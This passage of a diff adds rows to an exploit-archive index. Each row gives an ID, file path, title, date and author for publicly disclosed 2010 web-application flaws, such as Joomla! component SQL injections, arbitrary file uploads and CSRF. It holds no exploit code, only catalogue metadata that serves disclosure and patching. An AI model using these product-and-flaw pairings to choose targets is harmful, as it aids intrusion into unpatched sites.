C. Klein Keane",webapps,php, +14232,exploits/php/webapps/14232.txt,"Joomla! Component JPodium 2.7.3 - SQL Injection",2010-07-05,RoAd_KiLlEr,webapps,php, +14233,exploits/php/webapps/14233.txt,"Bs Auction Script - SQL Injection",2010-07-05,Sid3^effects,webapps,php, +14237,exploits/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web Application Vulnerabilities",2010-07-06,"Alexey Sintsov",webapps,php, +14238,exploits/php/webapps/14238.txt,"BS Auction - SQL Injection",2010-07-06,"Easy Laster",webapps,php, +14239,exploits/php/webapps/14239.txt,"Auto Dealer - SQL Injection (PoC)",2010-07-06,"Easy Laster",webapps,php, +14240,exploits/php/webapps/14240.txt,"BS Auto Classifieds - 'info.php' SQL Injection (PoC)",2010-07-06,"Easy Laster",webapps,php, +14241,exploits/php/webapps/14241.txt,"BS Business Directory - 'articlesdetails.php' SQL Injection (PoC)",2010-07-06,"Easy Laster",webapps,php, +14242,exploits/php/webapps/14242.txt,"BS Classifieds Ads - 'articlesdetails.php' SQL Injection (PoC)",2010-07-06,"Easy Laster",webapps,php, +14243,exploits/php/webapps/14243.txt,"BS Events Directory - 'articlesdetails.php' SQL Injection (PoC)",2010-07-06,"Easy Laster",webapps,php, +14244,exploits/php/webapps/14244.txt,"Lyrics 3.0 - Engine SQL Injection",2010-07-06,Sid3^effects,webapps,php, +14245,exploits/php/webapps/14245.txt,"PreProject Multi-Vendor Shopping Malls - SQL Injection / Authentication Bypass",2010-07-06,**RoAd_KiLlEr**,webapps,php, +14249,exploits/php/webapps/14249.txt,"Joomla! Component AutarTimonial 1.0.8 - SQL Injection",2010-07-06,Sid3^effects,webapps,php, +14251,exploits/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection",2010-07-06,S.W.T,webapps,php, +14285,exploits/windows/webapps/14285.txt,"Outlook Web Access 2007 - Cross-Site Request Forgery",2010-07-08,"Rosario Valotta",webapps,windows, +14255,exploits/php/webapps/14255.txt,"sandbox 2.0.3 - Multiple Vulnerabilities",2010-07-06,"Salvatore Fresta",webapps,php, +14259,exploits/php/webapps/14259.txt,"Green Shop - SQL Injection",2010-07-07,PrinceofHacking,webapps,php, +14260,exploits/php/webapps/14260.txt,"Sijio Community Software - SQL Injection / Persistent Cross-Site Scripting",2010-07-07,Sid3^effects,webapps,php, +14262,exploits/php/webapps/14262.txt,"Simple Document Management System - SQL Injection",2010-07-07,Sid3^effects,webapps,php, +14264,exploits/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Configuration Cross-Site Request Forgery",2010-07-07,kalyanakumar,webapps,hardware, +14263,exploits/php/webapps/14263.txt,"Joomla! Component ArtForms 2.1b7.2 rc2 - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",webapps,php, +14265,exploits/php/webapps/14265.txt,"Joomla! Component PaymentsPlus 2.1.5 - Blind SQL Injection",2010-07-07,Sid3^effects,webapps,php, +14270,exploits/php/webapps/14270.txt,"Zylone IT - Multiple Blind SQL Injections",2010-07-08,Callo,webapps,php, +14271,exploits/php/webapps/14271.txt,"Pithcms - 'theme' Local/Remote File Inclusion",2010-07-08,eidelweiss,webapps,php, +14277,exploits/php/webapps/14277.txt,"Inout Music 1.0 - Arbitrary File Upload",2010-07-08,SONIC,webapps,php, +14278,exploits/php/webapps/14278.txt,"Inout Article Base Ultimate - Arbitrary File Upload",2010-07-08,SONIC,webapps,php, +14279,exploits/php/webapps/14279.txt,"Inout Ad server Ultimate - Arbitrary File Upload",2010-07-08,SONIC,webapps,php, +14280,exploits/php/webapps/14280.txt,"PG Social Networking - Arbitrary File Upload",2010-07-08,SONIC,webapps,php, +14281,exploits/asp/webapps/14281.txt,"KMSoft GB - SQL Injection",2010-07-08,SONIC,webapps,asp, +14283,exploits/asp/webapps/14283.txt,"ClickGallery Server - SQL Injection",2010-07-08,SONIC,webapps,asp, +14284,exploits/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,webapps,asp, +14289,exploits/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery",2010-07-09,saudi0hacker,webapps,php, +14293,exploits/php/webapps/14293.txt,"Joomla! Component Minify4Joomla - Arbitrary File Upload / Persistent Cross-Site Scripting",2010-07-09,Sid3^effects,webapps,php, +14291,exploits/php/webapps/14291.txt,"Joomla! Component IXXO Cart - SQL Injection",2010-07-09,Sid3^effects,webapps,php, +14434,exploits/php/webapps/14434.txt,"Joomla! Component com_jomtube - 'user_id' Blind SQL Injection",2010-07-22,SixP4ck3r,webapps,php, +14312,exploits/php/webapps/14312.txt,"Joomla! Component redSHOP 1.0 - 'pid' SQL Injection",2010-07-10,v3n0m,webapps,php, +14296,exploits/php/webapps/14296.txt,"Joomla! Component QuickFAQ 1.0.3 - Blind SQL Injection",2010-07-09,RoAd_KiLlEr,webapps,php, +14316,exploits/php/webapps/14316.pl,"PHP-Nuke 8.0 -Web_Links Module - Blind SQL Injection",2010-07-10,yawn,webapps,php, +14299,exploits/php/webapps/14299.txt,"CMS Contentia - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,webapps,php, +14306,exploits/php/webapps/14306.txt,"HoloCMS 9.0.47 - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,webapps,php, +14308,exploits/php/webapps/14308.txt,"WordPress Plugin Firestats - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",webapps,php, +14310,exploits/php/webapps/14310.js,"dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,webapps,php,80 +14313,exploits/php/webapps/14313.txt,"Joomla! Component MyHome - Blind SQL Injection",2010-07-10,Sid3^effects,webapps,php, +14315,exploits/php/webapps/14315.txt,"Joomla! Component MySMS - Arbitrary File Upload",2010-07-10,Sid3^effects,webapps,php, +14335,exploits/php/webapps/14335.txt,"Joomla! Component healthstats - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,webapps,php, +14318,exploits/php/webapps/14318.html,"Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-07-10,10n1z3d,webapps,php, +14319,exploits/php/webapps/14319.pl,"PHP-Nuke 8.1.0.3.5b - Remote Command Execution",2010-07-10,yawn,webapps,php, +14320,exploits/php/webapps/14320.pl,"PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,webapps,php, +14324,exploits/php/webapps/14324.txt,"Sillaj time tracking tool - Authentication Bypass",2010-07-10,"L0rd CrusAd3r",webapps,php, +14325,exploits/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",webapps,php, +14326,exploits/php/webapps/14326.txt,"My Kazaam Address & Contact ORGanizer - SQL Injection",2010-07-10,v3n0m,webapps,php, +14327,exploits/php/webapps/14327.txt,"Joomla! Component Rapid-Recipe - Persistent Cross-Site Scripting",2010-07-10,Sid3^effects,webapps,php, +14328,exploits/php/webapps/14328.html,"Macs CMS 1.1.4 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-11,10n1z3d,webapps,php, +14329,exploits/php/webapps/14329.html,"Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,webapps,php, +14330,exploits/php/webapps/14330.html,"TomatoCart 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,webapps,php, +14331,exploits/php/webapps/14331.html,"TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,webapps,php, +14336,exploits/php/webapps/14336.txt,"Joomla! Component EasyBlog - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,webapps,php, +14337,exploits/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,webapps,php, +14338,exploits/php/webapps/14338.html,"Getsimple CMS 2.01 - Multiple Vulnerabilities",2010-07-12,10n1z3d,webapps,php, +14342,exploits/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,webapps,php, +14355,exploits/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass",2010-07-13,"David K",webapps,windows, +14350,exploits/php/webapps/14350.txt,"Joomla! Component com_qcontacts - SQL Injection",2010-07-13,_mlk_,webapps,php, +14351,exploits/php/webapps/14351.txt,"I-net Enquiry Management Script - SQL Injection",2010-07-13,D4rk357,webapps,php, +14353,exploits/php/webapps/14353.html,"Diferior CMS 8.03 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-13,10n1z3d,webapps,php, +14354,exploits/php/webapps/14354.txt,"AJ Article 3.0 - Cross-Site Scripting",2010-07-13,Sid3^effects,webapps,php, +14356,exploits/php/webapps/14356.txt,"CustomCMS - Persistent Cross-Site Scripting",2010-07-13,Sid3^effects,webapps,php, +14357,exploits/php/webapps/14357.txt,"2DayBiz Businesscard Script - Authentication Bypass",2010-07-14,D4rk357,webapps,php, +14362,exploits/php/webapps/14362.txt,"CMSQLite - SQL Injection",2010-07-14,"High-Tech Bridge SA",webapps,php, +14365,exploits/php/webapps/14365.txt,"Campsite CMS - Remote Persistent Cross-Site Scripting",2010-07-15,D4rk357,webapps,php, +14366,exploits/php/webapps/14366.txt,"Whizzy CMS 10.01 - Local File Inclusion",2010-07-15,"Anarchy Angel",webapps,php, +14368,exploits/php/webapps/14368.txt,"Joomla! Component redSHOP 1.0.23.1 - Blind SQL Injection",2010-07-15,"Salvatore Fresta",webapps,php, +14369,exploits/jsp/webapps/14369.txt,"ORACLE Business Process Management (Process Administrator) 5.7-6.0-10.3 - Cross-Site Scripting",2010-07-15,Markot,webapps,jsp, +14370,exploits/php/webapps/14370.txt,"BS Scripts Directory - 'info.php' SQL Injection",2010-07-15,D4rk357,webapps,php, +14371,exploits/php/webapps/14371.txt,"BS Scripts Directory - 'articlesdetails.php' SQL Injection",2010-07-16,k4k4shi,webapps,php, +14374,exploits/php/webapps/14374.txt,"Pre Web Host System - Authentication Bypass",2010-07-16,D4rk357,webapps,php, +14375,exploits/php/webapps/14375.txt,"Pre Dynamic Institution - Web Authentication Bypass",2010-07-16,D4rk357,webapps,php, +14376,exploits/php/webapps/14376.txt,"Pre E-Smart Cart - Authentication Bypass",2010-07-16,D4rk357,webapps,php, +14377,exploits/php/webapps/14377.txt,"Pre SoftClones Marketing Management System - Authentication Bypass",2010-07-16,D4rk357,webapps,php, +14378,exploits/php/webapps/14378.txt,"Pre Podcast Portal - Authentication Bypass",2010-07-16,D4rk357,webapps,php, +14381,exploits/php/webapps/14381.txt,"Group Office - Remote Command Execution",2010-07-16,"ADEO Security",webapps,php, +14382,exploits/windows/webapps/14382.txt,"ActiTime 2.0-MA - Cross-Site Request Forgery",2010-07-16,Markot,webapps,windows, +14383,exploits/php/webapps/14383.txt,"Group Office - 'comment_id' SQL Injection",2010-07-16,"Canberk BOLAT",webapps,php, +14420,exploits/asp/webapps/14420.txt,"Mayasan Portal 2.0 - 'makaledetay.asp' SQL Injection",2010-07-20,v0calist,webapps,asp, +14421,exploits/asp/webapps/14421.txt,"Mayasan Portal 2.0 - 'haberdetay.asp' SQL Injection",2010-07-20,CoBRa_21,webapps,asp, +14389,exploits/php/webapps/14389.txt,"Freelancers Marketplace Script - Persistent Cross-Site Scripting",2010-07-17,Sid3^effects,webapps,php, +14390,exploits/php/webapps/14390.txt,"Freelancer Marketplace Script - Arbitrary File Upload",2010-07-17,Sid3^effects,webapps,php, +14391,exploits/php/webapps/14391.txt,"Subrion Auto Classifieds - Persistent Cross-Site Scripting",2010-07-17,Sid3^effects,webapps,php, +14392,exploits/php/webapps/14392.txt,"Kayako eSupport 3.70.02 - SQL Injection",2010-07-17,Sid3^effects,webapps,php, +14393,exploits/php/webapps/14393.txt,"Calendarix - 'cal_cat.php' SQL Injection",2010-07-17,SixP4ck3r,webapps,php, +14394,exploits/php/webapps/14394.txt,"Joomla! Component com_spa - SQL Injection (2)",2010-07-17,"Palyo34 & KroNicKq",webapps,php, +14395,exploits/php/webapps/14395.txt,"Joomla! Component StaticXT - SQL Injection",2010-07-17,"Palyo34 & KroNicKq",webapps,php, +14404,exploits/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,webapps,php, +14405,exploits/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",webapps,php, +14401,exploits/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,webapps,asp, +14410,exploits/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,webapps,php, +14415,exploits/php/webapps/14415.html,"EZ-osCommerce 3.1 - Arbitrary File Upload",2010-07-20,indoushka,webapps,php, +14419,exploits/asp/webapps/14419.txt,"Caner Hikaye Script - SQL Injection",2010-07-20,v0calist,webapps,asp, +14423,exploits/php/webapps/14423.txt,"Joomla! Component com_spa - SQL Injection (1)",2010-07-20,ALTBTA,webapps,php, +14425,exploits/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat - Remote File Inclusion",2010-07-20,"HaCkEr arar",webapps,php, +14426,exploits/php/webapps/14426.pl,"Imagine-cms 2.50 - SQL Injection",2010-07-21,Metropolis,webapps,php, +14427,exploits/windows/webapps/14427.txt,"Outlook Web Access 2003 - Cross-Site Request Forgery",2010-07-21,anonymous,webapps,windows, +14432,exploits/php/webapps/14432.txt,"OpenX - 'phpAdsNew' Remote File Inclusion",2010-07-21,"ViRuS Qalaa",webapps,php, +14430,exploits/php/webapps/14430.txt,"RapidLeech Scripts - Arbitrary File Upload",2010-07-21,H-SK33PY,webapps,php, +14435,exploits/php/webapps/14435.txt,"AJ HYIP PRIME - 'welcome.php?id' Blind SQL Injection",2010-07-22,JosS,webapps,php, +14436,exploits/php/webapps/14436.txt,"AJ HYIP MERIDIAN - 'news.php?id' Blind SQL Injection",2010-07-22,JosS,webapps,php, +14437,exploits/php/webapps/14437.txt,"Free PHP photo Gallery script - Remote Command Execution",2010-07-22,"ViRuS Qalaa",webapps,php, +14438,exploits/php/webapps/14438.txt,"Free PHP Photo Gallery Script - Remote File Inclusion",2010-07-22,"ViRuS Qalaa",webapps,php, +14439,exploits/php/webapps/14439.txt,"phpBazar Admin - Information Disclosure",2010-07-22,Net_Spy,webapps,php, +14440,exploits/php/webapps/14440.txt,"phpBB MOD 2.0.19 - Invitation Only (PassCode Bypass)",2010-07-22,Silic0n,webapps,php, +14441,exploits/php/webapps/14441.txt,"WordPress Plugin myLDlinker - SQL Injection",2010-07-22,H-SK33PY,webapps,php, +14442,exploits/php/webapps/14442.txt,"ZeeAdbox 2.x - SQL Injection",2010-07-23,SONIC,webapps,php, +14443,exploits/php/webapps/14443.txt,"LILDBI - Arbitrary File Upload",2010-07-23,EraGoN,webapps,php, +14444,exploits/php/webapps/14444.txt,"ZeeNetworking 1x - Arbitrary File Upload",2010-07-23,SONIC,webapps,php, +14445,exploits/php/webapps/14445.txt,"ZeeMatri 3.x - Arbitrary File Upload",2010-07-23,SONIC,webapps,php, +14446,exploits/php/webapps/14446.txt,"PhotoPost - PHP SQL Injection",2010-07-23,Cyber-sec,webapps,php, +14448,exploits/php/webapps/14448.txt,"Joomla! Component Golf Course Guide 0.9.6.0 - SQL Injection",2010-07-23,Valentin,webapps,php, +14449,exploits/php/webapps/14449.txt,"Joomla! Component Huru Helpdesk - SQL Injection (2)",2010-07-23,Amine_92,webapps,php, +14450,exploits/php/webapps/14450.txt,"Joomla! Component com_iproperty - SQL Injection",2010-07-23,Amine_92,webapps,php, +14453,exploits/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - 'ecard.php' SQL Injection",2010-07-23,CoBRa_21,webapps,php, +14454,exploits/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",webapps,php, +14455,exploits/php/webapps/14455.txt,"vBulletin 3.8.6 - 'faq.php' Information Disclosure",2010-07-24,H-SK33PY,webapps,php, +14457,exploits/php/webapps/14457.txt,"DM FileManager 3.9.11 - Arbitrary File Upload",2010-07-24,eidelweiss,webapps,php, +14458,exploits/php/webapps/14458.txt,"sNews - 'index.php' SQL Injection",2010-07-24,MajoR,webapps,php, +14459,exploits/php/webapps/14459.txt,"Open Realty 2.x/3.x - Persistent Cross-Site Scripting",2010-07-24,K053,webapps,php, +14461,exploits/asp/webapps/14461.txt,"AKY Blog - SQL Injection",2010-07-24,v0calist,webapps,asp, +14462,exploits/php/webapps/14462.txt,"Joomla! Component Ozio Gallery - SQL Injection",2010-07-24,"ViRuS Qalaa",webapps,php, +14463,exploits/php/webapps/14463.txt,"Joomla! Component com_itarmory - SQL Injection",2010-07-24,Craw,webapps,php, +14465,exploits/php/webapps/14465.txt,"sNews 1.7 - 'index.php?category' SQL Injection",2010-07-24,CoBRa_21,webapps,php, +14466,exploits/php/webapps/14466.txt,"Joomla! Component Joomdle 0.24 - SQL Injection",2010-07-24,kaMtiEz,webapps,php, +14467,exploits/php/webapps/14467.txt,"Joomla! Component YouTube 1.5 - SQL Injection",2010-07-24,Forza-Dz,webapps,php, +14469,exploits/php/webapps/14469.txt,"XAOS CMS - SQL Injection",2010-07-25,H-SK33PY,webapps,php, +14470,exploits/php/webapps/14470.txt,"Ballettin Forum - SQL Injection",2010-07-25,3v0,webapps,php, +14471,exploits/php/webapps/14471.txt,"CMS Ignition - SQL Injection",2010-07-25,neavorc,webapps,php, +14472,exploits/php/webapps/14472.txt,"WhiteBoard 0.1.30 - Multiple Blind SQL Injections",2010-07-25,"Salvatore Fresta",webapps,php, +14483,exploits/php/webapps/14483.pl,"PunBB 1.3.4 / Pun_PM 1.2.6 - Blind SQL Injection",2010-07-27,Dante90,webapps,php, +14474,exploits/php/webapps/14474.txt,"Freeway CMS 1.4.3.210 - SQL Injection",2010-07-26,**RoAd_KiLlEr**,webapps,php, +14476,exploits/php/webapps/14476.txt,"Joomla! Component Visites 1.1 RC2 - Remote File Inclusion",2010-07-26,Li0n-PaL,webapps,php, +14481,exploits/php/webapps/14481.txt,"Joomla! Component TTVideo 1.0 - SQL Injection",2010-07-27,"Salvatore Fresta",webapps,php, +14485,exploits/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",webapps,php, +14488,exploits/php/webapps/14488.txt,"Joomla! Component com_appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",webapps,php, +14490,exploits/php/webapps/14490.txt,"nuBuilder - Remote File Inclusion",2010-07-28,Ahlspiess,webapps,php, +14494,exploits/php/webapps/14494.txt,"AV Arcade 3 - Cookie Authentication Bypass",2010-07-28,saudi0hacker,webapps,php, +14495,exploits/php/webapps/14495.txt,"Joomla! Component com_photomapgallery 1.6.0 - Multiple Blind SQL Injections",2010-07-28,"Salvatore Fresta",webapps,php, +14499,exploits/php/webapps/14499.txt,"Joomla! Component com_pbbooking 1.0.4_3 - Multiple Blind SQL Injections",2010-07-29,"Salvatore Fresta",webapps,php, +14500,exploits/php/webapps/14500.txt,"Whizzy CMS 10.02 - Local File Inclusion",2010-07-29,"Anarchy Angel",webapps,php, +14501,exploits/php/webapps/14501.txt,"Joomla! Component com_SimpleShop - SQL Injection",2010-07-29,"UnD3rGr0unD W4rri0rZ",webapps,php, +14502,exploits/php/webapps/14502.txt,"Joomla! Component com_beamospetition - SQL Injection",2010-07-29,Forza-Dz,webapps,php, +14518,exploits/php/webapps/14518.txt,"Joomla! Component com_spielothek 1.6.9 - Multiple Blind SQL Injections",2010-07-31,"Salvatore Fresta",webapps,php, +14521,exploits/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 - Authentication Bypass",2010-08-01,Magnefikko,webapps,hardware, +14523,exploits/php/webapps/14523.txt,"SnoGrafx - 'cat.php?cat' SQL Injection",2010-08-02,CoBRa_21,webapps,php, +14528,exploits/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM - 'modules.php' SQL Injection",2010-08-02,secret,webapps,php, +14530,exploits/php/webapps/14530.txt,"Joomla! Component CamelcityDB 2.2 - SQL Injection",2010-08-02,Amine_92,webapps,php, +14531,exploits/php/webapps/14531.txt,"MyIT CRM - Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",webapps,php, +14534,exploits/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Inclusion",2010-08-03,eidelweiss,webapps,php, +14558,exploits/php/webapps/14558.txt,"sX-Shop - Multiple SQL Injections",2010-08-05,CoBRa_21,webapps,php, +14541,exploits/php/webapps/14541.txt,"WordPress Plugin NextGEN Smooth Gallery 0.12 - Blind SQL Injection",2010-08-03,kaMtiEz,webapps,php, +14547,exploits/windows/webapps/14547.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'OvJavaLocale' Buffer Overflow",2010-08-03,"Nahuel Riva",webapps,windows, +14557,exploits/php/webapps/14557.txt,"sX-Shop - 'view_image.php' SQL Injection",2010-08-05,secret,webapps,php, +14556,exploits/php/webapps/14556.txt,"Nuked-klaN Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,webapps,php, +14559,exploits/php/webapps/14559.txt,"APBoard 2.1.0 - 'board.php?id' SQL Injection",2010-08-05,secret,webapps,php, +14560,exploits/php/webapps/14560.txt,"ccTiddly 1.7.6 - Multiple Remote File Inclusions",2010-08-05,eidelweiss,webapps,php, +14569,exploits/php/webapps/14569.txt,"Joomla! Component com_cgtestimonial 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",webapps,php, +14562,exploits/php/webapps/14562.html,"Open Blog 1.2.1 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",webapps,php, +14563,exploits/php/webapps/14563.html,"BXR 0.6.8 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",webapps,php, +14564,exploits/php/webapps/14564.html,"Amethyst 0.1.5 - Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",webapps,php, +14565,exploits/php/webapps/14565.html,"DiamondList 0.1.6 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",webapps,php, +14570,exploits/php/webapps/14570.txt,"Joomla! Component NeoRecruit 1.4 - SQL Injection",2010-08-07,v3n0m,webapps,php, +14572,exploits/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection",2010-08-07,Silic0n,webapps,php, +14578,exploits/php/webapps/14578.php,"PHPKick 0.8 - 'Statistics.php' SQL Injection",2010-08-08,garwga,webapps,php, +14585,exploits/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,webapps,php, +14598,exploits/php/webapps/14598.txt,"Joomla! Component Teams - Multiple Blind SQL Injections",2010-08-10,"Salvatore Fresta",webapps,php, +14589,exploits/php/webapps/14589.txt,"PHP-Nuke 8.x.x - Blind SQL Injection",2010-08-09,ITSecTeam,webapps,php, +14592,exploits/php/webapps/14592.txt,"Joomla! Component com_yellowpages - SQL Injection",2010-08-09,"al bayraqim",webapps,php, +14595,exploits/php/webapps/14595.html,"wizmall 6.4 - Cross-Site Request Forgery",2010-08-09,pyw1414,webapps,php, +14596,exploits/php/webapps/14596.txt,"Joomla! Component Amblog 1.0 - Multiple SQL Injections",2010-08-10,"Salvatore Fresta",webapps,php, +14606,exploits/multiple/webapps/14606.html,"Zendesk - Multiple Vulnerabilities",2010-08-10,"Luis Santana",webapps,multiple, +14614,exploits/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Inclusion",2010-08-11,Offensive,webapps,php, +14615,exploits/php/webapps/14615.txt,"phpMUR - Remote File Disclosure",2010-08-11,Offensive,webapps,php, +14618,exploits/php/webapps/14618.txt,"Saurus CMS 4.7.0 - Remote File Inclusion",2010-08-11,LoSt.HaCkEr,webapps,php, +14617,exploits/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 - webapp XPath Injection",2010-08-11,"ADEO Security",webapps,jsp, +14622,exploits/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Persistent Cross-Site Scripting",2010-08-11,fdiskyou,webapps,php, +14628,exploits/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,webapps,win_x86,80 +14629,exploits/multiple/webapps/14629.html,"Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)",2010-08-12,"KOLTN S",webapps,multiple,80 +14636,exploits/php/webapps/14636.txt,"Plogger - Remote File Disclosure",2010-08-13,Mr.tro0oqy,webapps,php, +14637,exploits/php/webapps/14637.txt,"Get Tube - SQL Injection",2010-08-13,Mr.P3rfekT,webapps,php, +14639,exploits/php/webapps/14639.txt,"MailForm 1.2 - Remote File Inclusion",2010-08-13,LoSt.HaCkEr,webapps,php, +14640,exploits/php/webapps/14640.txt,"ACollab - Multiple Vulnerabilities",2010-08-14,AmnPardaz,webapps,php, +14643,exploits/php/webapps/14643.txt,"sFileManager 24a - Local File Inclusion",2010-08-14,Pepelux,webapps,php, +14644,exploits/php/webapps/14644.html,"Saurus CMS Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-14,"Fady Mohammed Osman",webapps,php, +14645,exploits/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - 'news_id' SQL Injection",2010-08-14,LiquidWorm,webapps,php, +14647,exploits/php/webapps/14647.php,"PHP-Fusion - Local File Inclusion",2010-08-15,MoDaMeR,webapps,php, +14648,exploits/php/webapps/14648.txt,"Guestbook Script PHP - Cross-Site Scripting / HTML Injection",2010-08-15,"AnTi SeCuRe",webapps,php, +14650,exploits/php/webapps/14650.html,"Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-15,10n1z3d,webapps,php, +14654,exploits/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution",2010-08-15,BlackHawk,webapps,php, +14655,exploits/php/webapps/14655.txt,"Joomla! Component com_equipment - SQL Injection",2010-08-16,Forza-Dz,webapps,php, +14656,exploits/php/webapps/14656.txt,"Joomla! Component com_jgrid 1.0 - Local File Inclusion",2010-08-16,"Salvatore Fresta",webapps,php, +14659,exploits/php/webapps/14659.txt,"Joomla! Component com_ongallery - SQL Injection",2010-08-16,"al bayraqim",webapps,php, +14672,exploits/php/webapps/14672.txt,"Free Simple Software 1.0 - Remote File Inclusion",2010-08-17,Dr.$audi,webapps,php, +14684,exploits/php/webapps/14684.php,"Open-Realty 2.5.7 - Local File Disclosure",2010-08-18,"Nikola Petrov",webapps,php, +14686,exploits/php/webapps/14686.txt,"vbbuletin 4.0.4 - Multiple Vulnerabilities",2010-08-19,mc2_s3lector,webapps,php, +14707,exploits/php/webapps/14707.txt,"Joomla! Component Fabrik - SQL Injection",2010-08-21,Mkr0x,webapps,php, +14694,exploits/php/webapps/14694.txt,"Joomla! Component com_extcalendar - Blind SQL Injection",2010-08-20,Lagripe-Dz,webapps,php, +14702,exploits/php/webapps/14702.txt,"Joomla! Component com_zina - SQL Injection",2010-08-21,"Th3 RDX",webapps,php, +14703,exploits/php/webapps/14703.txt,"Joomla! Component Biblioteca 1.0 Beta - Multiple SQL Injections",2010-08-21,"Salvatore Fresta",webapps,php, +14704,exploits/asp/webapps/14704.txt,"T-dreams Announcement Script - SQL Injection",2010-08-21,"Br0wn Sug4r",webapps,asp, +14709,exploits/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection",2010-08-22,L1nK,webapps,asp, +14712,exploits/php/webapps/14712.txt,"4Images 1.7.8 - Remote File Inclusion",2010-08-23,LoSt.HaCkEr,webapps,php, +14714,exploits/php/webapps/14714.txt,"Gazelle CMS - Multiple Vulnerabilities",2010-08-23,Sweet,webapps,php, +14716,exploits/php/webapps/14716.txt,"AneCMS - '/registre/next' SQL Injection",2010-08-23,Sweet,webapps,php, +14717,exploits/php/webapps/14717.txt,"Link CMS - SQL Injection",2010-08-23,hacker@sr.gov.yu,webapps,php, +14718,exploits/php/webapps/14718.txt,"Joomla! Component com_zoomportfolio - SQL Injection",2010-08-23,"Chip d3 bi0s",webapps,php, +14722,exploits/php/webapps/14722.txt,"Joomla! 1.5 - URL Redirecting",2010-08-24,Mr.MLL,webapps,php, +14828,exploits/php/webapps/14828.txt,"XOOPS 2.0.14 - 'article.php' SQL Injection",2010-08-28,[]0iZy5,webapps,php, +14737,exploits/php/webapps/14737.txt,"Simple Forum PHP - Multiple Vulnerabilities",2010-08-25,arnab_s,webapps,php, +14742,exploits/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,webapps,php, +14818,exploits/linux/webapps/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution",2010-08-27,"Nikolas Sotiriu",webapps,linux, +14817,exploits/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,webapps,php, +14806,exploits/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection",2010-08-26,"Lord Tittis3000",webapps,php, +14799,exploits/php/webapps/14799.txt,"osCommerce Online Merchant - Remote File Inclusion",2010-08-26,LoSt.HaCkEr,webapps,php, +14801,exploits/php/webapps/14801.txt,"Atomic Photo Album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,webapps,php, +14802,exploits/php/webapps/14802.html,"Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-26,10n1z3d,webapps,php, 